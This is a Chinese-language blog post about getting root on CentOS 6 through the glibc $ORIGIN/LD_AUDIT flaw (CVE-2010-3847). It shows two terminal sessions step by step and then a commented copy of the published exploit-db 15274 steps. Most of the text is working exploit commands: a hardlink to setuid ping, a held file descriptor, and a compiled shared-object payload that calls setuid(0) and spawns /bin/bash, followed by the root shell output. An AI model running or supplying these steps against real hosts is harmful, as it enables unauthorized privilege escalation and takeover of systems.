linux(CVE-2010-3847)漏洞和利用方法

15274

 

【linux提权记录】

存在危险的linux系统:

[root@dbserver a]# cat /etc/redhat-release
CentOS release 6.3 (Final)
[root@dbserver a]# uname -a
Linux dbserver 2.6.32-279.5.2.el6.i686 #1 SMP Thu Aug 23 22:16:48 UTC 2012 i686 i686 i386 GNU/Linux

【提权过程记录】

[root@dbserver a]# useradd test
[root@dbserver a]# passwd test
Changing password for user test.
New password:
BAD PASSWORD: it is based on a dictionary word
BAD PASSWORD: is too simple
Retype new password:
passwd: all authentication tokens updated successfully.
[root@dbserver a]# su  - test
[test@dbserver ~]$ ls
[test@dbserver ~]$ cd /tmp/
[test@dbserver tmp]$ mkdir exploit
[test@dbserver tmp]$ cd exploit/
[test@dbserver exploit]$ ln /bin/ping /tmp/exploit/target
[test@dbserver exploit]$ exec 3< /tmp/exploit/target
[test@dbserver exploit]$ ls -al
total 48
drwxrwxr-x   2 test test  4096 Jan  4 19:49 .
drwxrwxrwt. 37 root root  4096 Jan  4 19:49 ..
-rwsr-xr-x.  2 root root 36892 Jul 18  2011 target
[test@dbserver exploit]$ ls -l /proc/$$/fd/3
lr-x------ 1 test test 64 Jan  4 19:50 /proc/16369/fd/3 -> /tmp/exploit/target
[test@dbserver exploit]$ cd ..
[test@dbserver tmp]$ rm -rf /tmp/exploit/
[test@dbserver tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 test test 64 Jan  4 19:50 /proc/16369/fd/3 -> /tmp/exploit/target (deleted)
[test@dbserver tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 test test 64 Jan  4 19:50 /proc/16369/fd/3 -> /tmp/exploit/target (deleted)
[test@dbserver tmp]$ cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
^D    # 按 Ctrl+D 键结束输入
 
[test@dbserver tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[test@dbserver tmp]$ ls -l /tmp/exploit
-rwxrwxr-x 1 test test 4163 Jan  4 19:53 /tmp/exploit
[test@dbserver tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
            [-M mtu discovery hint] [-S sndbuf]
            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[root@dbserver a]# whoami
root
[root@dbserver a]# id
uid=0(root) gid=0(root) groups=0(root)

【第二次测试过程记录】

[root@91hpay ~]# useradd test
[root@91hpay ~]# passwd test
Changing password for user test.
New password:
BAD PASSWORD: it is based on a dictionary word
BAD PASSWORD: is too simple
Retype new password:
passwd: all authentication tokens updated successfully.
[root@91hpay ~]# su - test
[test@91hpay ~]$ cd /tmp/
[test@91hpay tmp]$ mkdir test
[test@91hpay tmp]$ cd test/
[test@91hpay test]$ ln /bin/ping /tmp/test/test
[test@91hpay test]$ cd ..
[test@91hpay tmp]$ exec 3< /tmp/test/test
[test@91hpay tmp]$ ls -al /tmp/test/test
-rwsr-xr-x. 2 root root 41432 Nov 12  2010 /tmp/test/test
[test@91hpay tmp]$ ls -l /proc/$$/fd/3
lr-x------. 1 test test 64 Jan  5 12:05 /proc/19378/fd/3 -> /tmp/test/test
[test@91hpay tmp]$ rm -rf /tmp/test
[test@91hpay tmp]$ ls -l /proc/$$/fd/3
lr-x------. 1 test test 64 Jan  5 12:05 /proc/19378/fd/3 -> /tmp/test/test (deleted)
[test@91hpay tmp]$ cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
[test@91hpay tmp]$ gcc -w -fPIC -shared -o /tmp/test payload.c
payload.c:5: error: redefinition of ‘init’
payload.c:1: note: previous definition of ‘init’ was here
[test@91hpay tmp]$ ls -l /tmp/test
ls: cannot access /tmp/test: No such file or directory
[test@91hpay tmp]$ vi payload.c
[test@91hpay tmp]$ ls -al payload.c
-rw-rw-r--. 1 test test 77 Jan  5 12:09 payload.c
[test@91hpay tmp]$ gcc -w -fPIC -shared -o /tmp/test payload.c
[test@91hpay tmp]$ ls -al /tmp/test
-rwxrwxr-x. 1 test test 6020 Jan  5 12:09 /tmp/test
[test@91hpay tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.
 
[root@91hpay ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
 
 
[root@91hpay ~]# cat /etc/redhat-release
CentOS Linux release 6.0 (Final)
[root@91hpay ~]# uname -a
Linux 91hpay.com 2.6.32-71.el6.x86_64 #1 SMP Fri May 20 03:51:51 BST 2011 x86_64 x86_64 x86_64 GNU/Linux

 

 

【过程介绍】
这个漏洞主要针对 Linux 操作系统,已经公开了一段时间。利用的前提是系统使用的 glibc 尚未修复该漏洞;在此前提下,只需查找系统中是否存在带有 setuid 权限的可执行文件,若存在,基本就可以提权成功。

下面是具体方法:

$ORIGIN 是一个 ELF 替换序列,代表所加载的可执行程序在文件系统目录结构中的位置。glibc 的动态链接器在为特权应用展开 $ORIGIN 替换的方式上存在漏洞:本地用户可以创建到 setuid 应用的硬链接,并通过 LD_AUDIT 强制展开 $ORIGIN,从而获得权限提升。

具体过程如下:

# 在/tmp下创建可控制的目录
$ mkdir /tmp/exploit

# 链接到suid二进制程序以更改$ORIGIN的定义
$ ln /bin/ping /tmp/exploit/target

# 打开到目标二进制程序的文件描述符
$ exec 3< /tmp/exploit/target

# 现在可通过/proc访问描述符
$ ls -l /proc/$$/fd/3

lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*

# 删除之前所创建的目录
$ rm -rf /tmp/exploit/

# /proc链接仍存在,但已标记为已被删除
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)

# 使用负载DSO替换目录,使$ORIGIN成为到dlopen()的有效目标
$ cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);

system("/bin/bash");
}
^D
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*

# 通过LD_AUDIT强制/proc中的链接加载$ORIGIN
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=500(taviso)

http://www.exploit-db.com/exploits/15274/

 

文 / admin